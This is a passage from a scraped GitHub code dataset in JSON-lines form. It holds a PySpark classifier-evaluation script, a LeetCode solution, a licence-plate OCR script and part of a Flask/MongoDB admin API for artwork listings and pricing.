== 0 and x[2] == 0): # the article was not Australian court case (x[0]) and the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Out of total positive labels predicted, how many correctly classified as positive, that is PPV\n\tdef precision(x):\n\t # Number of true positives/ (Number of true positives + Number of false positives) \n\t # return truePositive/(truePositive + falsePositive)\n\t return x[1][0]/(float(x[1][0] + x[1][1]))\n\n\t# Out of actual positive labels, how many correctly classified as positive, that is, TPR\n\tdef recall(x):\n\t # Number of true positives/ (Number of true positives + Number of false Negatives) \n\t # return truePositive/(truePositive + falseNegative)\n\t return x[1][0]/(float(x[1][0] + x[1][2]))\n\t \n\t \n\t# Calculate 'True Positives', 'False Positives' and 'False Negatives'\n\tcalcTP_FP_FN = yLabelAndXFeaturesPrediction.map(lambda x: (1, np.array([calculateTruePositives(x), calculateFalsePositives(x), calculateFalseNegatives(x),calculateTrueNegatives(x)]))).reduceByKey(np.add)\n\n\tprint('')\n\tprint ('#'*10, ' PERCEPTRON - RESULTS ' ,'#'*10)\n\tprint('Number of True Positives:', calcTP_FP_FN.collect()[0][1][0])\n\tprint('Number of False Positives:', calcTP_FP_FN.collect()[0][1][1])\n\tprint('Number of False Negatives:', calcTP_FP_FN.collect()[0][1][2])\n\tprint('Number of True Negatives:', calcTP_FP_FN.collect()[0][1][3])\n\tprint('')\n\n\t# Calculate F1 score\n\tcalculateF1score = calcTP_FP_FN.map(lambda x: (precision(x), recall(x))).map(lambda x: 2*x[0]*x[1] / (x[0] + x[1])).collect()[0]\n\tprint('F1 score for classifier =',round(calculateF1score*100,2),'%')\n\tprint('')\n\n\t# Calculating 
the testing time (making predictions using the model)\n\ttestingCompletionTimePerceptron = datetime.now()\n\ttestingTimePerceptron = testingCompletionTimePerceptron - TestingDatasetPreprocessingCompletionTime\n\n\t# calculate the total end to end time for program\n\ttotalTimePerceptron = timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess + trainingTimePerceptron + testingTimePerceptron\n\t\n\n\n\tprint(\"Time taken to read Testing and Training Data and preprocess:\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess)\n\tprint(\"Time taken to train the Perceptron model:\", trainingTimePerceptron)\n\tprint(\"Time taken to test the Perceptron model:\", testingTimePerceptron)\n\tprint(\"Total Time taken by Perceptron:\", totalTimePerceptron)\n\tprint ('#'*20)\n\n\t# List to store the results of task 1\n\tansForTask1 = []\n\n\tansForTask1.append(('#'*10, ' PERCEPTRON - RESULTS ' ,'#'*10))\n\tansForTask1.append(('F1 score for classifier =',round(calculateF1score*100,2),'%'))\n\n\tansForTask1.append('')\n\tansForTask1.append((\"Time taken to read Testing and Training Data and preprocess them (days:seconds:microsecond):\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess))\n\tansForTask1.append((\"Time taken to train the Perceptron model (days:seconds:microsecond):\", trainingTimePerceptron))\n\tansForTask1.append((\"Time taken to test the Perceptron model (days:seconds:microsecond):\", testingTimePerceptron))\n\tansForTask1.append((\"Total Time taken by Perceptron:\", totalTimePerceptron))\n\n\tansForTask1.append('')\n\tansForTask1.append(('Number of True Positives', calcTP_FP_FN.collect()[0][1][0]))\n\tansForTask1.append(('Number of False Positives', calcTP_FP_FN.collect()[0][1][1]))\n\tansForTask1.append(('Number of False Negatives', calcTP_FP_FN.collect()[0][1][2]))\n\tansForTask1.append(('Number of True Negatives', calcTP_FP_FN.collect()[0][1][3]))\n\tansForTask1.append('')\n\n\t###################################################################################################\n\t############### 4.2 Predict the labels using the Support Vector Machine Model ####################\n\t###################################################################################################\n\n\t# Prediction Function using SVM\n\tdef predictionSVM(x):\n\n\t if (np.dot(coefficients, x) - intercept >= 0):\n\t return 1\n\t else:\n\t return -1\n\n\t# Make the prediction using the function 'predictionSVM'\n\tyLabelAndXFeaturesPrediction = testingDataSVM.map(lambda x: (x[0],x[1],predictionSVM(x[1]),np.dot(coefficients,x[1])))\n\n\t# Function to calculate True Positives\n\tdef calculateTruePositives(x):\n\t if (x[0] == 1 and x[2] == 1): # the article was Australian court case (x[0]) and the prediction was also Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Positives\n\tdef calculateFalsePositives(x):\n\t if (x[0] == -1 and x[2] == 1): # the article was not Australian court case (x[0]) but the prediction was Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Negatives\n\tdef calculateFalseNegatives(x):\n\t if (x[0] == 1 and x[2] == -1): # the article was Australian court case (x[0]) but the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate True Negatives\n\tdef calculateTrueNegatives(x):\n\t if (x[0] == -1 and x[2] == -1): # the article was not Australian court case (x[0]) and the prediction was not 
Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Out of total positive labels predicted, how many correctly classified as positive, that is PPV\n\tdef precision(x):\n\t # Number of true positives/ (Number of true positives + Number of false positives) \n\t # return truePositive/(truePositive + falsePositive)\n\t return x[1][0]/(float(x[1][0] + x[1][1]))\n\n\t# Out of actual positive labels, how many correctly classified as positive, that is, TPR\n\tdef recall(x):\n\t # Number of true positives/ (Number of true positives + Number of false Negatives) \n\t # return truePositive/(truePositive + falseNegative)\n\t return x[1][0]/(float(x[1][0] + x[1][2]))\n\t \n\t \n\t# Calculate 'True Positives', 'False Positives', 'False Negatives' and 'True Negatives'\n\tcalcTP_FP_FN = yLabelAndXFeaturesPrediction.map(lambda x: (1, np.array([calculateTruePositives(x), calculateFalsePositives(x), calculateFalseNegatives(x),calculateTrueNegatives(x)]))).reduceByKey(np.add)\n\n\tprint('')\n\tprint('#'*10, ' SUPPORT VECTOR - RESULTS ' ,'#'*10)\n\tprint('Number of True Positives:', calcTP_FP_FN.collect()[0][1][0])\n\tprint('Number of False Positives:', calcTP_FP_FN.collect()[0][1][1])\n\tprint('Number of False Negatives:', calcTP_FP_FN.collect()[0][1][2])\n\tprint('Number of True Negatives:', calcTP_FP_FN.collect()[0][1][3])\n\tprint('')\n\n\t# Calculate F1 score\n\tcalculateF1score = calcTP_FP_FN.map(lambda x: (precision(x), recall(x))).map(lambda x: 2*x[0]*x[1] / (x[0] + x[1])).collect()[0]\n\tprint('F1 score for classifier =',round(calculateF1score*100,2),'%')\n\tprint('')\n\n\t# Calculating the testing time (making predictions using the model)\n\ttestingCompletionTime = datetime.now()\n\ttestingTimeSVM = testingCompletionTime - testingCompletionTimePerceptron\n\n\t\n\t# calculate the total end to end time for program\n\ttotalTimeSVM = timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess + trainingTimeSVM + testingTimeSVM\n\n\tprint(\"Time taken to read Testing and Training Data and preprocess them (h:mm:ss):\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess)\n\tprint(\"Time taken to train the Support Vector Machine model (h:mm:ss):\", trainingTimeSVM)\n\tprint(\"Time taken to test using the Support Vector Machine model (h:mm:ss):\", testingTimeSVM)\n\tprint(\"Total Time taken by Support Vector Machine (h:mm:ss):\", totalTimeSVM)\n\tprint ('#'*20)\n\n\t# List to store the results of task 1\n\tansForTask1.append(('#'*10, ' SUPPORT VECTOR - RESULTS ' ,'#'*10))\n\tansForTask1.append(('F1 score for classifier =',round(calculateF1score*100,2),'%'))\n\n\tansForTask1.append('')\n\tansForTask1.append((\"Time taken to read Testing and Training Data and preprocess them (days:seconds:microsecond):\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess))\n\tansForTask1.append((\"Time taken to train the Support Vector Machine model (days:seconds:microsecond):\", trainingTimeSVM))\n\tansForTask1.append((\"Time taken to test using the Support Vector Machine model (days:seconds:microsecond):\", testingTimeSVM))\n\tansForTask1.append((\"Total Time taken by Support Vector Machine (days:seconds:microsecond):\", totalTimeSVM))\n\n\tansForTask1.append('')\n\tansForTask1.append(('Number of True Positives', calcTP_FP_FN.collect()[0][1][0]))\n\tansForTask1.append(('Number of False Positives', calcTP_FP_FN.collect()[0][1][1]))\n\tansForTask1.append(('Number of False Negatives', calcTP_FP_FN.collect()[0][1][2]))\n\tansForTask1.append(('Number of True Negatives', 
calcTP_FP_FN.collect()[0][1][3]))\n\n\t# Save the results of task1 in a text file\n\tsc.parallelize(ansForTask1).coalesce(1, shuffle = False).saveAsTextFile(sys.argv[4]) \n\n\n\tsc.stop()\n\n", "repo_name": "gagankaushal/Australian_Court_cases_SVM_and_Perceptron_scratch", "sub_path": "main_task1.py", "file_name": "main_task1.py", "file_ext": "py", "file_size_in_byte": 26078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyspark.SparkContext", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 32, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 40, "usage_type": "argument"}, {"api_name": "sys.argv", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 151, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.heaviside", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 235, "usage_type": "attribute"}, {"api_name": "operator.add", "line_number": 236, "usage_type": "argument"}, {"api_name": "operator.add", "line_number": 239, "usage_type": "argument"}, {"api_name": "numpy.linalg.norm", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 245, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 262, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 290, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.linalg", 
"line_number": 291, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 295, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 300, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 311, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 336, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 336, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 346, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 379, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 395, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 395, "usage_type": "name"}, {"api_name": "numpy.heaviside", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 448, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 464, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 464, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 554, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 570, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 570, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 600, "usage_type": "attribute"}]} +{"seq_id": "39436138652", "text": "from typing import List\r\n\r\n\r\nclass Solution:\r\n def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:\r\n res = []\r\n people.sort(key = lambda x: (-x[0],x[1]))\r\n for p in people:\r\n res.insert(p[1], p)\r\n return res\r\n\r\n\r\npeople = [[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]\r\ns = Solution()\r\nans=s.reconstructQueue(people)\r\nprint(ans)\r\n", "repo_name": "Akram1234/June-LeetCoding-Challenge", "sub_path": "Week 1/Queue Reconstruction by Height.py", "file_name": "Queue Reconstruction by Height.py", "file_ext": "py", "file_size_in_byte": 388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "23515365645", "text": "'''\r\nobjective: detect number plate from camera\r\nDate: 2021-12-16\r\nAuthor: Nitish Kumar Sharma\r\nEmail: nitish.ns378@gmail.com\r\n\r\nLicense: MIT\r\nMIT License (c) 2021 Nitish Kumar Sharma\r\nThis code is licensed under the MIT license (see LICENSE.txt for details)\r\nYou are free to use this code in your own projects, as long as you give credit to the original author.\r\nall rights reserved. 
by Nitish Kumar Sharma\r\n\r\n'''\r\n\r\n# import open cv and read image and display it\r\nfrom typing import Pattern\r\nimport cv2\r\nimport numpy as np\r\nimport imutils\r\n# import easyocr\r\nimport sys\r\nimport os\r\n# from PIL import Image\r\nfrom pytesseract import pytesseract\r\nimport re\r\nimport copy\r\n\r\n# Change path to your path\r\npath_to_tesseract = \"C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe\"\r\npytesseract.tesseract_cmd = path_to_tesseract\r\n# read image from images folder and display it\r\n\r\ndef filter_text(text):\r\n print(\"Filtering text\")\r\n print(\"License plate Number (without Filter):{}\".format(text.replace(\"\\n\\n\",'')))\r\n Pattern = re.compile(r'[^a-zA-Z0-9\\s]')\r\n text = Pattern.sub('', copy.copy(text))\r\n print(\"License plate Number:{}\".format(text.replace(\"\\n\\n\",'')))\r\n\r\n\r\nvideo = cv2.VideoCapture(0)\r\nwhile True:\r\n _, image = video.read()\r\n cv2.imshow(\"Capturing\", image)\r\n image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n # cv2.imshow('gray', image_gray)\r\n # bilateral filter\r\n image_gray_blur = cv2.bilateralFilter(image_gray, 10, 75, 75)\r\n # cv2.imshow('blur', image_gray_blur)\r\n print(\"------------------Getting text from image--------------\")\r\n results = pytesseract.image_to_string(image_gray_blur, lang='eng')\r\n # print(results[:-1])\r\n # print(results)\r\n filter_text(results)\r\n print(\"------------------Getting text from image--------------\")\r\n edges = cv2.Canny(image_gray_blur, 100, 200)\r\n # cv2.imshow('edges', edges)\r\n # find contours and apply a mask\r\n keypoint = cv2.findContours(edges.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n countours = imutils.grab_contours(keypoint)\r\n countours = sorted(countours, key=cv2.contourArea, reverse=True)[:10]\r\n # print(countours)\r\n for c in countours:\r\n # compute the center of the contour\r\n # approx = cv2.approxPolyDP(c, 0.02 * cv2.arcLength(c, True), True)\r\n approx = cv2.approxPolyDP(c,10, True)\r\n if len(approx) == 4:\r\n ll = approx\r\n location = cv2.minAreaRect(c)\r\n # print(location)\r\n box = cv2.boxPoints(location)\r\n box = np.int0(box)\r\n cv2.drawContours(image, [box], -1, (0, 0, 255), 2)\r\n cv2.imshow('rectangles', image)\r\n # masking the image\r\n try:\r\n mask = np.zeros(image_gray.shape, dtype=\"uint8\")\r\n new_img = cv2.drawContours(mask, [ll], 0, 255, -1)\r\n new_img = cv2.bitwise_and(image, image, mask=new_img)\r\n # cv2.imshow('mask', new_img)\r\n\r\n (x,y) = np.where(mask == 255)\r\n (x1, y1) = (np.min(x), np.min(y))\r\n (x2, y2) = (np.max(x), np.max(y))\r\n crop_img = image[x1:x2+1, y1:y2+1]\r\n # save the image\r\n # cv2.imwrite('crop.jpg', crop_img)\r\n # cv2.imshow('crop', crop_img)\r\n \r\n # Use Easy OCR to read the text\r\n # reader = easyocr.Reader(['en'])\r\n # results = reader.readtext(crop_img)\r\n print(\"Getting text from image\")\r\n results = pytesseract.image_to_string(crop_img, lang='eng')\r\n # print(results[:-1])\r\n # print(results)\r\n filter_text(results)\r\n print(\"Done\")\r\n except:\r\n print(\"Error\")\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\nvideo.release()\r\ncv2.destroyAllWindows()\r\n", "repo_name": "kumarnitish378/Number_plate_and_face_detection", "sub_path": "Live_number_plate_detection.py", "file_name": "Live_number_plate_detection.py", "file_ext": "py", "file_size_in_byte": 3683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytesseract.pytesseract.tesseract_cmd", 
"line_number": 30, "usage_type": "attribute"}, {"api_name": "pytesseract.pytesseract", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Pattern", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Pattern.sub", "line_number": 37, "usage_type": "call"}, {"api_name": "typing.Pattern", "line_number": 37, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cv2.bilateralFilter", "line_number": 48, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract.image_to_string", "line_number": 51, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract", "line_number": 51, "usage_type": "name"}, {"api_name": "cv2.Canny", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "imutils.grab_contours", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cv2.approxPolyDP", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.minAreaRect", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 84, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract.image_to_string", "line_number": 94, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract", "line_number": 94, "usage_type": "name"}, {"api_name": "cv2.waitKey", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.release", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "42761371328", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@Time: 2020/07/19 15:15:04\n@File: admin_operating_api\n@Auth: money\n\"\"\"\nimport time\nimport datetime\nfrom flask import request\nfrom middleware.auth import response\nfrom initialize import log\nfrom initialize import client\nfrom initialize import init_stamp\nfrom constant import constant\n\n\ndef works_list_api(is_recommend):\n \"\"\"\n 作品列表调用接口\n :param is_recommend: 是否推荐 true推荐 false不推荐\n \"\"\"\n data = {}\n try:\n # 参数\n num = request.args.get(\"num\")\n page = request.args.get(\"page\")\n type = request.args.get(\"type\") # 发现传default, 微图传pic, 影集传video\n # 校验参数\n if not num:\n return response(msg=\"Bad Request: Miss params: 'num'.\", code=1, status=400)\n if not page:\n return 
response(msg=\"Bad Request: Miss params: 'page'.\", code=1, status=400)\n if int(page) < 1 or int(num) < 1:\n return response(msg=\"Bad Request: Params 'page' or 'num' is erroe.\", code=1, status=400)\n if type not in [\"default\", \"pic\", \"video\"]:\n return response(msg=\"Bad Request: Params 'type' is erroe.\", code=1, status=400)\n # 查询\n pipeline = [\n {\n \"$match\": {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": is_recommend\n }\n },\n {\"$skip\": (int(page) - 1) * int(num)},\n {\"$limit\": int(num)},\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"let\": {\"user_id\": \"$user_id\"},\n \"pipeline\": [{\"$match\": {\"$expr\": {\"$eq\": [\"$uid\", \"$$user_id\"]}}}],\n \"as\": \"user_item\"\n }\n },\n {\"$addFields\": {\"user_info\": {\"$arrayElemAt\": [\"$user_item\", 0]}}},\n {\"$addFields\": {\"author\": \"$user_info.nick\"}},\n {\"$unset\": [\"user_item\", \"user_info\"]},\n {\n \"$project\": {\n \"_id\": 0, \"uid\": 1, \"title\": 1, \"type\": 1, \"author\": 1, \"browse_num\": 1,\n \"create_time\": {\n \"$dateToString\": {\n \"format\": \"%Y-%m-%d %H:%M\",\n \"date\": {\"$add\": [init_stamp, \"$create_time\"]}\n }\n }\n }\n }\n ]\n cursor = client[\"works\"].aggregate(pipeline)\n condition = {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": is_recommend\n }\n count = client[\"works\"].find(condition).count()\n data_list = [doc for doc in cursor]\n data[\"count\"] = count\n data[\"list\"] = data_list if data_list else []\n return data\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_platform_info(uid=\"001\"):\n \"\"\"\n 平台定价信息\n :param uid: 官方定价信息uid\n \"\"\"\n data = {}\n try:\n # 查询\n pipeline = [\n {\"$match\": {\"uid\": uid}},\n {\n \"$project\": {\n \"_id\": 0, \"price\": 1,\n \"format\": {\n \"$cond\": {\n \"if\": {\"$eq\": [\"$format\", \"扩大授权\"]},\n \"then\": \"k_price\",\n \"else\": {\"$concat\": [{\"$toLower\": \"$format\"}, \"_price\"]}\n }\n }\n }\n },\n ]\n cursor = client[\"price\"].aggregate(pipeline)\n for doc in cursor:\n data.update({doc[\"format\"]: doc[\"price\"]})\n cursor = client[\"bank\"].find({\"state\": 1})\n fees_list = [doc for doc in cursor]\n fees = fees_list[0][\"fees\"] if fees_list else 0\n data.update({\"fees\": fees})\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef post_platform_pricing(uid=\"001\"):\n \"\"\"\n 平台定价\n :param uid: 官方定价信息uid\n \"\"\"\n try:\n s_price = request.json.get(\"s_price\")\n m_price = request.json.get(\"m_price\")\n l_price = request.json.get(\"l_price\")\n k_price = request.json.get(\"k_price\")\n fees = request.json.get(\"fees\")\n\n # 校验\n error = None\n if not s_price:\n error = \"请输入S规格价格\"\n elif not m_price:\n error = \"请输入M规格价格\"\n elif not l_price:\n error = \"请输入L规格价格\"\n elif not k_price:\n error = \"请输入扩大授权规格价格\"\n elif not fees:\n error = \"请输入手续费\"\n elif fees > 100:\n error = \"手续费最高100\"\n elif not any([isinstance(s_price, int), isinstance(s_price, float)]):\n error = \"请输入S规格有效价格\"\n elif not any([isinstance(m_price, int), isinstance(m_price, float)]):\n error = \"请输入M规格有效价格\"\n elif not any([isinstance(l_price, int), isinstance(l_price, 
float)]):\n error = \"Please enter a valid price for size L\"\n elif not any([isinstance(k_price, int), isinstance(k_price, float)]):\n error = \"Please enter a valid price for the extended license\"\n elif not any([isinstance(fees, int), isinstance(fees, float)]):\n error = \"Please enter a valid fee\"\n\n if error:\n return response(msg=error, code=1)\n\n client[\"price\"].update({\"format\": \"S\", \"uid\": uid}, {\"$set\": {\"price\": float(s_price)}})\n client[\"price\"].update({\"format\": \"M\", \"uid\": uid}, {\"$set\": {\"price\": float(m_price)}})\n client[\"price\"].update({\"format\": \"L\", \"uid\": uid}, {\"$set\": {\"price\": float(l_price)}})\n client[\"price\"].update({\"format\": \"扩大授权\", \"uid\": uid}, {\"$set\": {\"price\": float(k_price)}})\n client[\"bank\"].update({\"state\": 1}, {\"$set\": {\"fees\": float(fees)}}, multi=True)\n return response()\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_recomm_works_list():\n \"\"\"Recommended works list\"\"\"\n try:\n data = works_list_api(True)\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef put_recomm_state():\n \"\"\"Remove a recommended work\"\"\"\n try:\n # Parameters\n works_id = request.json.get(\"works_id\")\n if not works_id:\n return response(msg=\"Bad Request: Miss params: 'works_id'.\", code=1, status=400)\n # Update\n doc = client[\"works\"].update({\"uid\": works_id}, {\"$set\": {\"is_recommend\": False}})\n if doc[\"n\"] == 0:\n return response(msg=\"Bad Request: Update failed.\", code=1, status=400)\n return response()\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_option_works_list():\n \"\"\"Works selection list\"\"\"\n try:\n data = works_list_api(False)\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_option_works_list_search(delta_time=30):\n \"\"\"\n Works selection list search\n :param delta_time: maximum allowed query window, 30 days\n \"\"\"\n data = {}\n try:\n # Parameters\n content = request.args.get(\"content\")\n category = request.args.get(\"category\") # pass title for title search, author for author search\n type = request.args.get(\"type\") # pass default for Discover, pic for micro pics, video for albums\n num = request.args.get(\"num\")\n page = request.args.get(\"page\")\n start_time = request.args.get(\"start_time\")\n end_time = request.args.get(\"end_time\")\n start_time = start_time + \" 00:00:00\"\n end_time = end_time + \" 23:59:59\"\n timeArray1 = datetime.datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S\")\n timeArray2 = datetime.datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\n start_time = int(time.mktime(timeArray1.timetuple()) * 1000)\n end_time = int(time.mktime(timeArray2.timetuple()) * 1000)\n # Validate parameters\n if not num:\n return response(msg=\"Bad Request: Miss params: 'num'.\", code=1, status=400)\n if not page:\n return response(msg=\"Bad Request: Miss params: 'page'.\", code=1, status=400)\n if int(page) < 1 or int(num) < 1:\n return response(msg=\"Bad Request: Params 'page' or 'num' is invalid.\", code=1, status=400)\n if content and category not in [\"title\", \"author\"]:\n return response(msg=\"Bad Request: Params 'category' is invalid.\", code=1, status=400)\n if type not in [\"default\", \"pic\", \"video\"]:\n return response(msg=\"Bad Request: Params 'type' is invalid.\", code=1, status=400)\n if not start_time:\n return response(msg=\"Bad Request: Miss params: 'start_time'.\", code=1, status=400)\n if not end_time:\n return 
response(msg=\"Bad Request: Miss params: 'end_time'.\", code=1, status=400)\n if (int(end_time) - int(start_time)) // (24 * 3600 * 1000) > delta_time:\n return response(msg=f\"最多可连续查询{delta_time}天以内的作品\", code=1)\n if len(content) > constant.SEARCH_MAX:\n return response(msg=f\"搜索字数上限{constant.SEARCH_MAX}\", code=1)\n\n pipeline = [\n {\n \"$match\": {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": False,\n (\"title\" if category == \"title\" else \"nick\") if content else \"null\": \\\n {\"$regex\": content} if content else None,\n \"$and\": [{\"create_time\": {\"$gte\": int(start_time)}}, {\"create_time\": {\"$lte\": int(end_time)}}]\n }\n },\n {\"$skip\": (int(page) - 1) * int(num)},\n {\"$limit\": int(num)},\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"let\": {\"user_id\": \"$user_id\"},\n \"pipeline\": [{\"$match\": {\"$expr\": {\"$eq\": [\"$uid\", \"$$user_id\"]}}}],\n 